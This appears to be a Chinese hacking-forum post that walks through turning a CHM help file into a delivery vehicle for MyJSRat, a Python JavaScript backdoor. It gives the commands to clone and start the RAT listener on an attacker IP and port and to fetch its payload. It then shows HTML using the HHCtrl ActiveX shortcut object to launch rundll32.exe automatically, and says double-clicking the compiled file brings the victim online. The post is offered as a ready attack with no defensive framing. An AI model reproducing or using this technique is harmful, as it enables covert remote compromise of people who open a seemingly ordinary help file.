taibeihacker
Moderator
MyJSRat结合CHM命令执行
MyJSRat
MyJSRat 是JSBackdoor 的python 版本下載地址:https://github.com/Ridter/MyJSRat
Easy CHM
CHM是英語Compiled Help Manual 的簡寫,即「已編譯的幫助文件」。 CHM 是微軟新一代的幫助文件格式,利用HTML 作源文,把幫助內容以類似數據庫的形式編譯儲存。步骤
下载 MyJSRat 并运行
1git clone https://github.com/Ridter/MyJSRat
1
python MyJSRat.py -i IPaddr -p port
下载 wtf 文件
瀏覽器訪問https://IPaddr
ort/wtf,並保存至txt 文件中
将上面保存的代码写入到如下代码的 Item1 的 Value 值中
注:要在rundll32.exe 前後添加,1
!DOCTYPE htmlhtmlheadtitleMousejack replay/titlehead/headbodycommand exec OBJECT id=x classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' width=1 height=1PARAM name='Command' value='ShortCut' PARAM name='Button' value='Bitmap:shortcut' PARAM name='Item1' value=',rundll32.exe,' PARAM name='Item2' value='273,1,1'/OBJECTSCRIPTx.Click();/SCRIPT/body/html
保存为 HTML 文件
新建目錄,將上述代碼保存在新建文件夾中通过 EasyCHM 制作 CHM 文件
通過EasyCHM編譯exp.html文件
双击上线
此時只要雙擊test.CHM文件,即可上線